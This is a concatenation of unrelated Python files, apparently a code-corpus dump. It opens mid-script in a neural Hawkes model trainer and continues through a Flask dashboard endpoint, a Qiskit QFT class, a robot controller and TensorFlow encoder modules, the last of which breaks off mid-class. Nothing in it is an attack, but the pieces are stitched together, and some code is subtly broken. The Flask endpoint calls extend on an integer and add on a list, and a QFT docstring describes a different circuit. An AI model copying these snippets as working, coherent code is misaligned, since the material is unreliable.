help='Prune stream? Give me the index ! 0 is nothng to prune. Note : index specifies a COMBINATION of event types by its binary coding (e.g. 0--00000, 1--00001, 31-11111 where 1 means this type is pruned)!'
)
parser.add_argument(
'-ds', '--DevIncludedSetting',#required=False,
default = 0, type = int,
choices = [0,1],
help='Alternative setting (fix tuned hyper-params, train on combo of train and dev, then test)? 0--False, 1--True Note: in our project, this is ONLY used to compare prev work on MIMIC, SO and Financial datasets'
)
parser.add_argument(
'-pf', '--PredictFirst', #required=False,
default = 1, type = int,
choices = [0,1],
help='Predict the first event ? 0--False, 1--True Note: in our project, this is False ONLY on MIMIC, SO and Financial datasets'
)
parser.add_argument(
'-pl', '--PredictLambda', #required=False,
default = 0, type = int,
choices = [0,1],
help='Predict Lambda (intensity) ? 0--False, 1--True Note: this is used ONLY in intensity evaluation'
)
'''
They train model on entire training and eval on test after training, i.e., no dev/validation set
We only use this setting when compared with them on their dataset
Otherwise, we use dev/validation set to tune params and early stop, and only eval on test after the model is fixed.
'''
#
#
args = parser.parse_args()
#
#
args.TrainRatio = numpy.float32(args.TrainRatio)
assert(args.TrainRatio > 0.0 and args.TrainRatio <= 1.0)
#
args.CoefL2 = numpy.float32(args.CoefL2)
assert(args.CoefL2 >= 0.0)
args.DimLSTM = numpy.int32(args.DimLSTM)
args.Seed = numpy.int32(args.Seed)
args.TrackPeriod = numpy.int32(args.TrackPeriod)
args.MaxEpoch = numpy.int32(args.MaxEpoch)
args.SizeBatch = numpy.int32(args.SizeBatch)
args.MultipleTrain = numpy.int32(args.MultipleTrain)
args.MultipleDev = numpy.int32(args.MultipleDev)
#
if args.LossType == 'prediction':
assert(args.WhatTrack == 'rmse' or args.WhatTrack == 'rate')
else:
assert(args.WhatTrack == 'loss')
#
args.LearnRate = numpy.float32(args.LearnRate)
assert(args.LearnRate > 0.0)
#
if args.PartialPredict == 0:
args.PartialPredict = False
else:
args.PartialPredict = True
#
args.PruneStream = numpy.int32(args.PruneStream)
#
if args.DevIncludedSetting == 0:
args.DevIncludedSetting = False
else:
args.DevIncludedSetting = True
#
if args.PredictFirst == 0:
args.PredictFirst = False
else:
args.PredictFirst = True
#
if args.PredictLambda == 0:
args.PredictLambda = False
else:
args.PredictLambda = True
#
#
id_process = os.getpid()
time_current = datetime.datetime.now().isoformat()
#
flag_1 = (
args.Model == 'hawkes' or args.Model == 'hawkesinhib' or args.Model == 'neural' or args.Model == 'neuralgeneral' or args.Model == 'neuraladapt' or args.Model == 'neuraltime' or args.Model == 'neuralgeneraltime' or args.Model == 'neuraladapttime'
)
flag_2 = (
args.Model == 'nanmodel'
)
flag_3 = (
args.Model == 'neuraladapttimescale' or args.Model == 'hawkesinhibscale' or args.Model == 'neuralreduce' or args.Model == 'conttime'
)
#
# conttime is the one with continuous time LSTM
#
assert(flag_1 or flag_2 or flag_3)
# we stop using neuralsimple
# +time means we encode time using neural networks
#
tag_model = '_PID='+str(id_process)+'_TIME='+time_current
#
#file_log = os.path.abspath(
# './logs/log' + tag_model + '.txt'
#)
#path_save = os.path.abspath(
# './models/models' + tag_model + '/'
#)
if 'meme' in args.FileData:
tag_track = '_meme'
elif 'retweet' in args.FileData:
tag_track = '_retweet'
elif 'mimic' in args.FileData:
tag_track = '_mimic'
elif '_so' in args.FileData:
tag_track = '_so'
elif '_bookorder' in args.FileData:
tag_track = '_bookorder'
elif '_missing' in args.FileData:
tag_track = '_missing'
else:
tag_track = ''
#
path_track = './tracks'+ tag_track +'/track' + tag_model + '/'
file_log = os.path.abspath(
path_track + 'log.txt'
)
#path_save = os.path.abspath(
# path_track + 'models/'
#)
path_save = path_track
#
command_mkdir = 'mkdir -p ' + os.path.abspath(
path_track
)
os.system(command_mkdir)
#
#
## show values ##
print ("PID is : %s" % str(id_process) )
print ("TIME is : %s" % time_current )
print ("Seed is : %s" % str(args.Seed) )
#
print ("Model is : %s" % args.Model )
print ("CoefL2 is : %s" % str(args.CoefL2) )
print ("FileData is : %s" % args.FileData )
print ("TrainRatio is : %s" % str(args.TrainRatio) )
if 'neural' in args.Model or 'nanmodel' in args.Model:
print ("DimLSTM is : %s" % str(args.DimLSTM) )
print ("FilePretrain is : %s" % args.FilePretrain)
print ("TrackPeriod is : %s" % str(args.TrackPeriod) )
print ("MaxEpoch is : %s" % str(args.MaxEpoch) )
print ("SizeBatch is : %s" % str(args.SizeBatch) )
print ("Optimizer is : %s" % args.Optimizer)
print ("LossType is : %s" % args.LossType)
print ("WhatTrack is : %s" % args.WhatTrack)
print ("LearnRate is : %s" % args.LearnRate)
print ("PartialPredict is : %s" % args.PartialPredict)
print ("PruneStream is : %s" % str(args.PruneStream) )
print ("Dev Included Setting is: %s" % args.DevIncludedSetting )
print ("PredictFirst is: %s" % args.PredictFirst )
print ("PredictLambda is: %s" % args.PredictLambda )
#
flag_show_1 = (
args.Model == 'hawkesinhib' or args.Model == 'neural' or args.Model == 'neuralgeneral' or args.Model == 'neuraladapt' or args.Model == 'neuralsimple' or args.Model == 'neuraltime' or args.Model == 'neuralgeneraltime' or args.Model == 'neuraladapttime'
)
flag_show_2 = (
args.Model == 'hawkesinhibscale' or args.Model == 'neuraladapttimescale' or args.Model == 'neuralreduce' or args.Model == 'conttime'
)
#
if (flag_show_1 and flag_show_2):
print ("Multiple for training is : %s" % args.MultipleTrain)
print ("Multiple for dev is : %s" % args.MultipleDev)
#
dict_args = {
'PID': id_process,
'TIME': time_current,
'Seed': args.Seed,
#
'Model': args.Model,
'CoefL2': args.CoefL2,
'FileData': args.FileData,
'TrainRatio': args.TrainRatio,
'DimLSTM': args.DimLSTM,
'FilePretrain': args.FilePretrain,
'TrackPeriod': args.TrackPeriod,
'MaxEpoch': args.MaxEpoch,
'SizeBatch': args.SizeBatch,
'Optimizer': args.Optimizer,
'MultipleTrain': args.MultipleTrain,
'MultipleDev': args.MultipleDev,
'LossType': args.LossType,
'WhatTrack': args.WhatTrack,
'LearnRate': args.LearnRate,
'PartialPredict': args.PartialPredict,
'PruneStream': args.PruneStream,
'DevIncludedSetting': args.DevIncludedSetting,
'PredictLambda': args.PredictLambda
}
#
input_train = {
'model': args.Model,
'seed_random': args.Seed,
'path_rawdata': args.FileData,
'ratio_train': args.TrainRatio,
'path_pre_train': args.FilePretrain,
'track_period': args.TrackPeriod,
'max_epoch': args.MaxEpoch,
'size_batch': args.SizeBatch,
'dim_model': args.DimLSTM,
'optimizer': args.Optimizer,
'save_file_path': path_save,
'log_file': file_log,
'args': dict_args,
'coef_l2': args.CoefL2,
'what_to_track': args.WhatTrack,
'loss_type': args.LossType,
'learn_rate': args.LearnRate,
'partial_predict': args.PartialPredict,
'prune_stream': args.PruneStream,
'di_setting': args.DevIncludedSetting,
'predict_lambda': args.PredictLambda
}
#
if '_so' in args.FileData or '_mimic' in args.FileData or '_bookorder' in args.FileData:
input_train['predict_first'] = False
else:
if args.PredictFirst:
input_train['predict_first'] = True
else:
input_train['predict_first'] = False
#
#
flag_multiple_1 = (
args.Model == 'hawkesinhib' or args.Model == 'neural' or args.Model == 'neuralgeneral' or args.Model == 'neuraladapt' or args.Model == 'neuralsimple' or args.Model == 'neuraltime' or args.Model == 'neuralgeneraltime' or args.Model == 'neuraladapttime'
)
flag_multiple_2 = (
args.Model == 'hawkesinhibscale' or args.Model == 'neuraladapttimescale' or args.Model == 'neuralreduce' or args.Model == 'conttime'
)
#
if (flag_multiple_1 or flag_multiple_2):
input_train['multiple_sample_for_train'] = numpy.int32(
args.MultipleTrain
)
input_train['multiple_sample_for_dev'] = numpy.int32(
args.MultipleDev
)
#
if args.Model == 'hawkes':
run_models.train_hawkes_ctsm(input_train)
elif args.Model == 'hawkesinhib' or args.Model == 'hawkesinhibscale':
run_models.train_hawkesinhib_ctsm(input_train)
elif args.Model == 'neural':
run_models.train_neural_hawkes_ctsm(input_train)
elif args.Model == 'neuralgeneral':
run_models.train_generalized_neural_hawkes_ctsm(
input_train, tag_neural_type = 'general'
)
elif args.Model == 'neuraladapt':
run_models.train_generalized_neural_hawkes_ctsm(
input_train, tag_neural_type = 'adaptive'
)
elif args.Model == 'neuralsimple':
run_models.train_generalized_neural_hawkes_ctsm(
input_train, tag_neural_type = 'simple'
)
elif args.Model == 'neuraltime':
run_models.train_neural_hawkes_ctsm_time(
input_train
)
elif args.Model == 'neuralgeneraltime':
run_models.train_generalized_neural_hawkes_ctsm_time(
input_train, tag_neural_type = 'general'
)
elif args.Model == 'neuraladapttime' or args.Model == 'neuraladapttimescale' or args.Model == 'neuralreduce' or args.Model == 'conttime':
if args.DevIncludedSetting:
run_models.train_generalized_neural_hawkes_ctsm_time_DevIncludedSetting(
input_train, tag_neural_type = 'adaptive'
)
else:
run_models.train_generalized_neural_hawkes_ctsm_time(
input_train, tag_neural_type = 'adaptive'
)
else:
print("Model not implemented yet !!! ")
#
if __name__ == "__main__": main()
| python |
from os import getenv
from rockset import Client, Q, F
rs = Client(api_key=getenv('ROCKSET_SECRET'), api_server='api.rs2.usw2.rockset.com')
def after_req(response):
cnt = rs.sql(
Q('NewsArchivesHits').where(F['_id']=='News').select('count')
)[0]['count']
rs.Collection.retrieve('NewsArchivesHits').add_docs(
[
{
'_id': 'News',
'count': cnt + 1
}
]
)
return(response) | python |
from datetime import datetime
from pydantic import BaseModel
from pydantic import Field
class TodoCreate(BaseModel):
title: str = Field(..., min_length=4, max_length=50, example="My first task")
class Todo(TodoCreate):
id: int = Field(...)
is_done: bool = Field(default=False)
created_at: datetime = Field(default=datetime.now())
| python |
#!/usr/bin/env python3
'''
Copyright 2018, VDMS
Licensed under the terms of the BSD 2-clause license. See LICENSE file for terms.
/sapi/modify endpoint. Designed to initiate a sapi API user.
```swagger-yaml
/custdashboard/modify/{dash_id}/ :
get:
description: |
Modifies a custom audit by either adding, removing or setting an audit_id
or list of audit_ids
responses:
200:
description: OK
tags:
- dashboard
parameters:
- name: dash_id
in: path
description: |
Dashboard ID of the dashboard you wish to modify
schema:
type: string
required: true
- name: modifyorder
in: query
description: |
A dict that tells the system what it should do. Contains one or two keys,
"add" with an audit_id or list of audit_id's to be added and/or "remove"
with an audit_id or list of audit_ids to be removed. This is a parsed
by ast.literal_eval.
schema:
type: string
required: true
```
'''
from flask import current_app, Blueprint, g, request, jsonify, send_from_directory
import json
import ast
import time
import os
import hashlib
import re
import requests
custdashboard_modify = Blueprint('api2_custdashboard_modify', __name__)
@custdashboard_modify.route("/custdashboard/modify", methods=['GET', 'POST'])
@custdashboard_modify.route("/custdashboard/modify/", methods=['GET', 'POST'])
@custdashboard_modify.route("/custdashboard/modify/<int:dash_id>", methods=['GET', 'POST'])
@custdashboard_modify.route("/custdashboard/modify/<int:dash_id>/", methods=['GET', 'POST'])
def api2_custdashboard_create(dash_id=None, modifyorder=None):
meta_dict = dict()
request_data = dict()
links_dict = dict()
error_dict = dict()
do_query = True
argument_error = False
api_error = False
where_clauses = list()
do_remove = False
do_add = False
remove_ids = list()
add_ids = list()
username = g.USERNAME
# Grab Audits and CustomDashboards From API to help validate.
audit_list_endpoint = g.HTTPENDPOINT + "/v2/auditlist/"
custdash_list_endpoint = g.HTTPENDPOINT + "/v2/custdashboard/list/"
valid_custdash_ids = list()
valid_audit_ids = list()
try:
audit_list_content = requests.get(audit_list_endpoint).content
custdash_list_content = requests.get(custdash_list_endpoint).content
except Exception as e:
error_dict["Error Getting Endpoint"] = "Error getting endpoint: " + \
str(e)
api_error = True
else:
try:
audit_list_content_string = audit_list_content.decode("utf-8")
custdash_list_content_string = custdash_list_content.decode(
"utf-8")
audit_list_content_object = json.loads(audit_list_content_string)
custdash_list_content_object = json.loads(
custdash_list_content_string)
except Exception as e:
api_error = True
error_dict["api_read_error"] = "Trouble reading data from endpoints. " + \
str(e)
else:
# Let's generate lists validation lists
valid_audit_ids = [id["attributes"]["audit_id"]
for id in audit_list_content_object["data"]]
valid_custdash_ids = [id["attributes"]["custdashboardid"]
for id in custdash_list_content_object["data"]]
if "dash_id" in request.args:
try:
dash_id = ast.literal_eval(request.args["dash_id"])
except Exception as e:
argument_error = True
error_dict["dash_id_parse_fail"] = "Failed to Parse Dash_id"
if type(dash_id) is int and dash_id in valid_custdash_ids and api_error == False:
# Valid dashboard id
pass
else:
argument_error = True
error_dict["dash_id_incorrect"] = "Either not a valid dash_id or not an integer"
if "modifyorder" not in request.args:
argument_error = True
error_dict["arg_error"] = "Need an order to modify with."
else:
try:
modifyorder = ast.literal_eval(request.args["modifyorder"])
except Exception as e:
argument_error = True
error_dict["modify_order_parse_fail"] = "Unabel to Parse Modify Order, it \
ast.literal_eval parsable?"
else:
if type(modifyorder) is not dict:
argument_error = True
error_dict["modify_order_bad_type"] = "Modify Order not parsed as \
dict"
else:
# Now testkeys
if "add" in modifyorder.keys() or "remove" in modifyorder.keys():
# Have at least one "proper" order
if "add" in modifyorder.keys():
# Do add stuff
if type(modifyorder["add"]) is list:
possible_id_list = [id for id in modifyorder["add"] if type(
id) is int and id > 0 and id in valid_audit_ids]
if len(possible_id_list) > 0:
# There are IDs
do_add = True
add_ids.extend(possible_id_list)
if type(modifyorder["add"]) is int:
if modifyorder["add"] > 0 and modifyorder["add"] in valid_audit_ids:
do_add = True
add_ids.extend(modifyorder["add"])
if "remove" in modifyorder.keys():
if type(modifyorder["remove"]) is list:
possible_id_list = [id for id in modifyorder["remove"] if type(
id) is int and id > 0 and id in valid_audit_ids]
if len(possible_id_list) > 0:
# There are IDs
do_remove = True
remove_ids.extend(possible_id_list)
elif type(modifyorder["remove"]) is int:
if modifyorder["remove"] > 0 and modifyorder["remove"] in valid_audit_ids:
do_remove = True
remove_ids.add(modifyorder["remove"])
if do_remove == False and do_add == False:
# None Came out right
argument_error = True
error_dict["incorrect_modify_order"] = "No modifies were accepted."
else:
# Order keys not given
argument_error = True
error_dict["order_dictionary_incorrect"] = True
meta_dict["version"] = 2
meta_dict["name"] = "Jellyfish API Version 2 Custdashboard Create "
meta_dict["status"] = "In Progress"
meta_dict["NOW"] = g.NOW
links_dict["parent"] = g.config_items["v2api"]["preroot"] + \
g.config_items["v2api"]["root"] + "/sapi"
requesttype = "custdashboard_modify"
remove_query = "delete from custdashboardmembers where fk_custdashboardid = %s and fk_audits_id = %s "
add_query = "replace into custdashboardmembers ( fk_custdashboardid, fk_audits_id ) VALUES ( %s , %s ) "
thathappened = dict()
if do_query and argument_error == False and api_error == False:
dash_modified = False
if do_add == True:
# Add all the items
thathappened["added"] = list()
for add_id in add_ids:
# I wan to Add this Id
this_arg_list = [dash_id, add_id]
g.cur.execute(add_query, this_arg_list)
id_added = g.cur.lastrowid
thathappened["added"].append(id_added)
dash_modified = True
if do_remove == True:
thathappened["removed"] = remove_ids
for remove_id in remove_ids:
# I want to Remove these IDs
this_arg_list = [dash_id, remove_id]
g.cur.execute(remove_query, this_arg_list)
dash_modified = True
request_data["dash_id"] = dash_id
else:
dash_modified = False
if dash_modified == True:
response_dict = dict()
response_dict["meta"] = meta_dict
response_dict["data"] = thathappened
response_dict["links"] = links_dict
return jsonify(**response_dict)
else:
response_dict = dict()
response_dict["meta"] = meta_dict
response_dict["errors"] = error_dict
response_dict["links"] = links_dict
return jsonify(**response_dict)
| python |
import click
import os
from click.exceptions import ClickException
from .dashboard import read_har_json, plot_har
@click.command()
@click.argument('path', type=click.Path(exists=True))
def plot(path):
"""
Plot HTTP Archive format Timings
:param path: Path containing HAR specs in json files
"""
data = []
har_files = [file for file in os.listdir(path) if file.endswith('.json')]
if not har_files:
raise ClickException('No Json file to process in given path')
click.echo('***** Processing har files *****')
for har_file in har_files:
data.append(read_har_json(os.path.join(path, har_file), har_file))
plot_har(data)
if __name__ == '__main__':
plot()
| python |
import FWCore.ParameterSet.Config as cms
DQMStore = cms.Service("DQMStore",
enableMultiThread = cms.untracked.bool(True),
saveByLumi = cms.untracked.bool(False),
trackME = cms.untracked.string(''),
verbose = cms.untracked.int32(0)
)
| python |
import sys
import math
import numpy as np
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
class QFT:
"""
Class which generates the circuit to perform the Quantum Fourier
Transform (or its inverse) as described in Mike & Ike Chapter 5.
(Michael A Nielsen and Isaac L Chuang. Quantum computation and quantum
information (10th anniv. version), 2010.)
For another example see Figure 1 of Daniel E Browne 2007 New J. Phys. 9 146
A QFT or iQFT circuit can be generated with a given instance of the
QFT class by calling the gen_circuit() method.
Attributes
----------
width : int
number of qubits
inverse : bool
Set to true to generate the inverse quantum fourier transform
kvals : bool
optional parameter that will change the angle of the controlled
rotations so that when the circuit is printed it will display
the same k values that are shown in Mike & Ike Chpt 5, Fig 5.1
(NOTE: the generated circuit will no longer be valid! This is
for visualization purposes only.)
barriers : bool
should barriers be included in the generated circuit
measure : bool
should a classical register & measurement be added to the circuit
regname : str
optional string to name the quantum and classical registers. This
allows for the easy concatenation of multiple QuantumCircuits.
qr : QuantumRegister
Qiskit QuantumRegister holding all of the quantum bits
cr : ClassicalRegister
Qiskit ClassicalRegister holding all of the classical bits
circ : QuantumCircuit
Qiskit QuantumCircuit that represents the uccsd circuit
"""
def __init__(self, width, approximation_degree, inverse=False, kvals=False, barriers=True,
measure=False, regname=None):
# number of qubits
self.nq = width
self.approximation_degree = approximation_degree
# set flags for circuit generation
self.inverse = inverse
self.kvals = kvals
self.barriers = barriers
self.measure = measure
# create a QuantumCircuit object
if regname is None:
self.qr = QuantumRegister(self.nq)
self.cr = ClassicalRegister(self.nq)
else:
self.qr = QuantumRegister(self.nq, name=regname)
self.cr = ClassicalRegister(self.nq, name='c'+regname)
# Have the option to include measurement if desired
if self.measure:
self.circ = QuantumCircuit(self.qr,self.cr)
else:
self.circ = QuantumCircuit(self.qr)
def inv_qft(self):
"""
Implement the inverse QFT on self.circ
j ranges from nq-1 -> 0
k ranges from nq-1 -> j+1
For each j qubit, a controlled cu1 gate is applied with target=j,
control=k (for each k).
cu1 = 1 0
0 e^(-2pi*i / 2^(k-j+1))
"""
for j in range(self.nq-1,-1,-1):
for k in range(self.nq-1,j,-1):
if self.kvals:
self.circ.cu1(-1*(k-j+1), self.qr[k], self.qr[j])
else:
self.circ.cu1(-1 * (2*np.pi) / (2**(k-j+1)),
self.qr[k],
self.qr[j])
self.circ.h(self.qr[j])
if self.barriers:
self.circ.barrier()
def reg_qft(self):
"""
Implement the QFT on self.circ
j ranges from 0 -> nq-1
k ranges from j+1 -> nq-1
For each j qubit, a controlled cu1 gate is applied with target=j,
control=k (for each k).
cu1 = 1 0
0 e^(2pi*i / 2^(k-j+1))
"""
for j in range(self.nq):
self.circ.h(self.qr[j])
for k in range(j+1,self.nq):
if self.kvals:
self.circ.cu1(k-j+1, self.qr[k], self.qr[j])
else:
if k-j+1<=self.approximation_degree:
self.circ.cu1((2*np.pi)/(2**(k-j+1)),self.qr[k],self.qr[j])
if self.barriers:
self.circ.barrier()
def gen_circuit(self):
"""
Create a circuit implementing the UCCSD ansatz
Given the number of qubits and parameters, construct the
ansatz as given in Whitfield et al.
Returns
-------
QuantumCircuit
QuantumCircuit object of size nq with no ClassicalRegister and
no measurements
"""
if self.inverse:
self.inv_qft()
else:
self.reg_qft()
if self.measure:
self.circ.barrier()
self.circ.measure(self.qr,self.cr)
return self.circ
| python |
from breezycreate2 import _Create2
import time
# A simple melody that plays every time the bot is connected to.
MELODY = [('C4',11,0.3),
('C4',11,0.3),
('C4',11,0.3),
('C4',32,0.7),
('G4',32,0.7),
('F4',11,0.3),
('E4',11,0.3),
('D4',11,0.3),
('C5',64,1.2),
('G4',40,0.7),
('F4',11,0.3),
('E4',11,0.3),
('D4',11,0.3),
('C5',64,1.2),
('G4',40,0.7),
('F4',11,0.3),
('E4',11,0.3),
('F4',11,0.3),
('D4',64,2) ]
class SillyRobot:
def __init__(self):
self.robot = _Create2('COM3', 115200) # Connect to the bot through the serial connection
self.robot.full() # Put the robot in full mode
self.robot.digit_led_ascii('R4D4') # Displays the string on the robot's display
for triple in MELODY: # Play a simple melody
self.robot.play_note(triple[0], triple[1])
time.sleep(triple[2])
def close(self):
"""Closes connection to robot"""
self.robot.digit_led_ascii(" ") # Clears the led display
self.robot.destroy()
def move(self, speed, sleep):
"""Sends move command to robot to move forward or backward
Speed: -500 to 500
sleep: How long the robot should move"""
self.robot.drive(speed, 0) # Moves the robot forward at the specified speed
time.sleep(sleep) # Sleep while the robot moves
self.robot.drive(0, 0) # Stops the robot
def turn(self, speed, direction, sleep):
"""Sends move command to robot to run
speed: 0 to 500
dir: -1(CW) to 1(CCW)
sleep: How long the robot should turn
"""
if speed < 0: # If the speed input is below 0
speed = abs(speed)
self.robot.drive(speed, direction) # Have the robot turn a certain direction at a certain speed
time.sleep(sleep) # Sleep while the robot turns
self.robot.drive(0, 0) # Stop the robot
def enable_motors(self, main_speed, side_speed, vacuum_speed):
"""Turns the motors on in the rear of the robot
main_speed: Main Brush, -127 to 127, Positive spins inward
side_speed: Side Brush, -127 to 127, Positive speeds spin counterclockwise
vacuum_speed: Vacuum, 0 to 127, No Negative speeds allowed
"""
if vacuum_speed < 0:
vacuum_speed = abs(vacuum_speed)
self.robot.motors_pwm(main_speed, side_speed, vacuum_speed)
def disable_motors(self):
"""Turns the motors off in the rear of the robot"""
self.robot.motors_pwm(0, 0, 0)
def set_led(self, display_string):
"""Sets the robots led display
Must be 4 characters long
Space is represented by ' '"""
self.robot.digit_led_ascii(display_string)
def test_move(bot):
bot.move(100, 2) # Move the bot forward
bot.turn(100, -1, 1) # Turn the bot clockwise
bot.move(-100, 2) # Move the bot backwards
def test_motors(bot):
bot.enable_motors(127, 127, 127) # Turn the motors on
time.sleep(2) # Sleep for 2 seconds
bot.disable_motors() # Turn motors off
def main():
robot = SillyRobot() # Create a new robot
selection = 'n' # Sentinel variable
while selection != 'q':
print("Select an option\n" # Display a small menu
"1: Test Movement\n"
"2: Test Motors\n"
"Q: Quit")
selection = input() # Get input
print(selection)
if selection == '1': # Move the robot
test_move(robot)
elif selection == '2': # Enable the motors
test_motors(robot)
elif selection == 'q' or selection == 'Q': # Quit
selection = selection.lower()
print("Thanks for trying out the robot!")
else: # Invalid input
print("Invalid input. Please try again.")
robot.close() # Close the connection
main()
| python |
"""
This network is build on top of SNGAN network implementation from: https://github.com/MingtaoGuo/sngan_projection_TensorFlow.git
"""
from explainer.ops import *
from tensorflow.contrib.layers import flatten
import pdb
def get_embedding_size():
return [64, 64, 4]
class Generator_Encoder_Decoder:
def __init__(self, name='GAN'):
self.name = name
def __call__(self, inputs, y, nums_class, num_channel=3):
with tf.variable_scope(name_or_scope=self.name, reuse=tf.AUTO_REUSE):
# input: [n, 64, 64, 3]
# Encoder
print("Encoder-Decoder")
print(inputs)
inputs = relu(conditional_batchnorm(inputs, "GBN1"))
embedding = conv("Gconv1", inputs, k_size=3, nums_out=4, strides=1) # [n, 64, 64, 4]
print(':', embedding)
inputs = relu(conditional_batchnorm(embedding, "GBN"))
inputs = conv("Gconv", inputs, k_size=3, nums_out=num_channel, strides=1) # [n, 64, 64, 3]
print(':', inputs)
return tf.nn.tanh(inputs), embedding
def var_list(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.name)
class Discriminator_Ordinal:
def __init__(self, name):
self.name = name
def __call__(self, inputs, y, nums_class, update_collection=None):
with tf.variable_scope(name_or_scope=self.name, reuse=tf.AUTO_REUSE):
# input: [n, 64, 64, 3]
print(inputs)
inputs = relu(conditional_batchnorm(inputs, "DBN1"))
inputs = conv("Dconv1", inputs, k_size=3, nums_out=4, strides=1) # [n, 64, 64, 4]
print(inputs)
inputs = global_sum_pooling(inputs) # [n, 4]
inputs = dense("Ddense", inputs, 1, update_collection, is_sn=False) # [n, 1]
return inputs
def var_list(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.name)
# class Generator_Encoder_Decoder:
# def __init__(self, name='GAN'):
# self.name = name
#
# def __call__(self, inputs, y, nums_class, num_channel=3):
# with tf.variable_scope(name_or_scope=self.name, reuse=tf.AUTO_REUSE):
# # input: [n, 64, 64, 3]
# # Encoder
# print("Encoder-Decoder")
# print(inputs)
# inputs = relu(conditional_batchnorm(inputs, "BN1"))
# embedding = conv("conv1", inputs, k_size=3, nums_out=64, strides=1) # [n, 64, 64, 64]
#
# print(':', embedding)
#
# inputs = relu(conditional_batchnorm(embedding, "BN"))
# inputs = conv("conv", inputs, k_size=3, nums_out=num_channel, strides=1) # [n, 64, 64, 3]
# print(':', inputs)
# return tf.nn.tanh(inputs), embedding
#
# def var_list(self):
# return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.name)
# class Discriminator_Ordinal:
# def __init__(self, name):
# self.name = name
#
# def __call__(self, inputs, y, nums_class, update_collection=None):
# with tf.variable_scope(name_or_scope=self.name, reuse=tf.AUTO_REUSE):
# # input: [n, 64, 64, 3]
# print(inputs)
# inputs = D_FirstResblock("ResBlock1", inputs, 64, update_collection, is_down=True) # [n, 32, 32, 64]
# print(inputs)
# inputs = relu(inputs)
# print(inputs) # [n, 4, 4, 512]
# inputs = global_sum_pooling(inputs) # [n, 1024]
# for i in range(0, nums_class - 1):
# if i == 0:
# temp = Inner_product(inputs, y[:, i + 1], 2, update_collection) # [n, 1024]
# else:
# temp = temp + Inner_product(inputs, y[:, i + 1], 2, update_collection) # [n, 1024]
# inputs = dense("dense", inputs, 1, update_collection, is_sn=True) # [n, 1]
# inputs = temp + inputs
# return inputs
#
# def var_list(self):
# return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.name)
class Discriminator_Contrastive:
# Compares two images and determines which "knob" has been shifted
def __init__(self, name='disentangler'):
self.name = name
def __call__(self, inputs, num_dims):
with tf.variable_scope(name_or_scope=self.name, reuse=tf.AUTO_REUSE):
# input: [n, 64, 64, 6]
print(inputs)
inputs = D_FirstResblock("ResBlock1", inputs, 64, None, is_down=True) # [n, 32, 32, 64]
print(inputs)
inputs = D_Resblock("ResBlock2", inputs, 128, None, is_down=True) # [n, 16, 16, 128]
print(inputs)
inputs = relu(inputs)
print(inputs) # [n, 16, 16, 128]
inputs = global_sum_pooling(inputs) # [n, 128]
print(inputs)
inputs = dense("dense", inputs, num_dims, None, is_sn=True) # [n, num_dims]
return inputs
def var_list(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.name)
# CSVAE modules
# One simple implementation with swiss roll data: https://github.com/kareenaaahuang/am207_final_project
# CSVAE architecture: Trying to replicate the architecture used in https://arxiv.org/abs/1812.06190
# "Our architectures consist of convolutional layers with ReLu activations which roughly follow that found in https://arxiv.org/abs/1512.09300."
# Here is the information found in Table 1 , in "Autoencoding beyond pixels using a learned similarity metric" https://arxiv.org/abs/1512.09300
# Encoder
# 5×5 64 conv. ↓, BNorm, ReLU
# 5×5 128 conv. ↓, BNorm, ReLU
# 5×5 256 conv. ↓, BNorm, ReLU
# 2048 fully-connected, BNorm, ReLU
# Dec
# 8·8·256 fully-connected, BNorm, ReLU
# 5×5 256 conv. ↑, BNorm, ReLU
# 5×5 128 conv. ↑, BNorm, ReLU
# 5×5 32 conv. ↑, BNorm, ReLU
# 5×5 3 conv., tanh
# Discriminator [This is not applicable to our implementation, because we are not using a GAN]
# 5×5 32 conv., ReLU
# 5×5 128 conv. ↓, BNorm, ReLU
# 5×5 256 conv. ↓, BNorm, ReLU
# 5×5 256 conv. ↓, BNorm, ReLU
# 512 fully-connected, BNorm, ReLU
# 1 fully-connected, sigmoid
# Architectures for the three networks that comprise VAE/GAN.
# ↓ and ↑ represent down- and upsampling respectively.
# BNorm denotes batch normalization (Ioffe & Szegedy, 2015).
# When batch normalization is applied to convolutional layers, per-channel normalization is used.
# implementation found here https://github.com/andersbll/autoencoding_beyond_pixels
class EncoderZ:
"""
This class transforms the images into a vector in the latent space, Z.
Example:
Input dimension: [n, 64, 64, 3] images
Output dimension: num_dims (z_dim in the latent space)
"""
def __init__(self, name='encoder_z'):
self.name = name
def __call__(self, inputs, num_dims):
with tf.variable_scope(name_or_scope=self.name, reuse=tf.AUTO_REUSE):
# input: [n, 64, 64, 3]
print(self.name)
print(inputs)
inputs = Encoder_Block("Encoder-ConvBlock3", inputs, 64) # [n, 32, 32, 64]
print(':', inputs)
inputs = Encoder_Block("Encoder-ConvBlock2", inputs, 128) # [n, 16, 16, 128]
print(':', inputs)
inputs = Encoder_Block("Encoder-ConvBlock1", inputs, 256) # [n, 8, 8, 256]
print(':', inputs)
inputs = global_sum_pooling(inputs) # [n, 256]
print(':', inputs)
inputs = dense("dense1", inputs, 2048) # [n, 2048]
inputs = relu(inputs)
print(':', inputs)
inputs = dense("dense", inputs, 2 * num_dims) # [n, 2*num_dims] 2 refers to mu and logvar
inputs = relu(inputs)
print(':', inputs)
mu = inputs[:, 0:num_dims]
logvar = inputs[:, num_dims:]
samples = tf.random_normal(shape=tf.shape(mu), mean=mu, stddev=tf.exp(0.5 * logvar))
return mu, logvar, samples
def var_list(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.name)
class EncoderW:
"""
This class transforms the images and labels into a vector in the latent space, W.
Example:
Input dimension: [n, 64, 64, 3] images , [n, 1] labels
Output dimension: num_dims (w_dim in the latent space)
"""
def __init__(self, name='encoder_w'):
self.name = name
def __call__(self, inputs, labels, num_dims):
with tf.variable_scope(name_or_scope=self.name, reuse=tf.AUTO_REUSE):
# inputs: [n, 64, 64, 3], labels: [n, 1]
print(self.name)
print(inputs)
inputs = Encoder_Block("Encoder-ConvBlock3", inputs, 64) # [n, 32, 32, 64]
print(':', inputs)
inputs = Encoder_Block("Encoder-ConvBlock2", inputs, 128) # [n, 16, 16, 128]
print(':', inputs)
inputs = Encoder_Block("Encoder-ConvBlock1", inputs, 256) # [n, 8, 8, 256]
print(':', inputs)
